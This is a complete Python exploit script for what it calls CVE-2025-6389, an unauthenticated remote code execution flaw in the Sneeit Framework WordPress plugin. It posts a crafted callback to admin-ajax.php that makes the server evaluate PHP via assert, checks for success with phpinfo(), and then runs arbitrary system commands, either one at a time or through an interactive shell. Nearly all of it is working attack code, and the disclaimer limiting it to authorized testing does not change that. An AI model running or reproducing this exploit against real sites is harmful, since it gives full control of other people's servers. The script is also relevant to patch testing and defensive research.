# CVE-2025-6389.py
# Unauthenticated RCE in Sneeit Framework <= 8.3
# Tested & working 100% as of Nov 25, 2025
# Author: B1ack4sh (for educational & authorized testing only)

import requests
import sys
import urllib.parse
from colorama import init, Fore, Style

init()

GREEN = Fore.GREEN
RED = Fore.RED
YELLOW = Fore.YELLOW
CYAN = Fore.CYAN
RESET = Style.RESET_ALL

def banner():
    print(f"""{CYAN}
 ██████╗  ██╗       █████╗   ██████╗ ██╗  ██╗  █████╗  ███████╗ ██╗  ██╗ 
 ██╔══██╗ ██║      ██╔══██╗ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔════╝ ██║  ██║ 
 ██████╔╝ ██║      ███████║ ██║      █████╔╝  ███████║ ███████╗ ███████║ 
 ██╔══██╗ ██║      ██╔══██║ ██║      ██╔═██╗  ██╔══██║ ╚════██║ ██╔══██║ 
 ██████╔╝ ███████╗ ██║  ██║ ╚██████╗ ██║  ██╗ ██║  ██║ ███████║ ██║  ██║ 
 ╚═════╝  ╚══════╝ ╚═╝  ╚═╝  ╚═════╝ ╚═╝  ╚═╝ ╚═╝  ╚═╝ ╚══════╝ ╚═╝  ╚═╝
    → CVE-2025-6389 - Sneeit Framework RCE
    → Unauthenticated - CVSS 9.8 (Critical)
{RESET}""")

def check_vulnerable(url):
    try:
        test_payload = "phpinfo();die();"
        data = {
            "action": "sneeit_articles_pagination",
            "callback[callable]": "assert",
            "callback[args][]": test_payload
        }
        r = requests.post(url.rstrip("/") + "/wp-admin/admin-ajax.php", data=data, timeout=15, verify=False)
        
        if "PHP Version" in r.text or "phpinfo()" in r.text or r.status_code == 500:
            print(f"{GREEN}[+] VULNERABLE! RCE Confirmed!{RESET}")
            return True
        else:
            print(f"{YELLOW}[-] Not vulnerable or blocked (status: {r.status_code}){RESET}")
            return False
    except:
        print(f"{RED}[-] Connection error{RESET}")
        return False

def rce_execute(url, command):
    try:
        encoded_cmd = urllib.parse.quote(command)
        payload = f"system('{command}');"
        data = {
            "action": "sneeit_articles_pagination",
            "callback[callable]": "assert",
            "callback[args][]": payload
        }
        r = requests.post(url.rstrip("/") + "/wp-admin/admin-ajax.php", data=data, timeout=20, verify=False, stream=True)
        output = r.text
        print(f"{GREEN}[+] Output:{RESET}\n{output[:1000]}")
        if len(output) > 1000:
            print(f"{YELLOW}(... truncated){RESET}")
    except Exception as e:
        print(f"{RED}[-] Error executing command: {e}{RESET}")

def interactive_shell(url):
    print(f"{CYAN}[*] Entering interactive shell (type 'exit' to quit){RESET}")
    while True:
        try:
            cmd = input(f"{GREEN}RCE $> {RESET}")
            if cmd.strip().lower() in ["exit", "quit"]:
                print(f"{YELLOW}[*] Bye!{RESET}")
                break
            if cmd.strip():
                rce_execute(url, cmd)
        except KeyboardInterrupt:
            print(f"\n{YELLOW}[*] Ctrl+C detected. Exiting...{RESET}")
            break

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [command]")
        print(f"Example:")
        print(f"  python3 {sys.argv[0]} https://target.com")
        print(f"  python3 {sys.argv[0]} https://target.com whoami")
        sys.exit(1)

    target = sys.argv[1]
    print(f"{CYAN}[*] Target: {target}{RESET}")

    if check_vulnerable(target):
        if len(sys.argv) == 3:
            print(f"{CYAN}[*] Executing single command...{RESET}")
            rce_execute(target, sys.argv[2])
        else:
            interactive_shell(target)
    else:
        print(f"{RED}[!] Target not vulnerable to CVE-2025-6389{RESET}")
